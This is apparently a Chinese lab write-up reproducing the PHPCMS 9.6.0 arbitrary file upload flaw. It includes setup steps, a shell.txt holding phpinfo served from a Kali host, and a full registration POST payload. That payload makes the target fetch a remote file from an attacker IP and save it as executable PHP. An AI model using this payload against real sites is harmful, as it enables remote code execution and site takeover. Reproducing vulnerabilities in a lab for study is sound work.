一，下载安装phpcmsv966.0

1，下载官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/下载之后，将源码都解压到phpstudy的www目录，浏览器访问源码中的install目录，一步步安装

 

2，打开后台管理，进入后台，后台账号密码为之前安装时候设置的账号密码

 

二、漏洞复现

1，查询资料可知，任意文件上传漏洞出现在，PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下载远程/本地文件时没有对文件的类型做正确的校验。远程攻击者可以利用该漏洞上传并执行任意的PHP代码。

2，漏洞利用，在phpcms注册界面，填写信息进行抓包

3、在另一个系统(kali),开启web服务,然后在web根目录下创建一个txt文件,写入如下信息

vim shell.txt

<?php phpinfo();?>

 

4. 构造POC

siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://192.168.190.134/shell.txt?.php#.jpg>&dosubmit=1&protocol=

 

5,访问得到的上传路径，可以看到脚本正常执行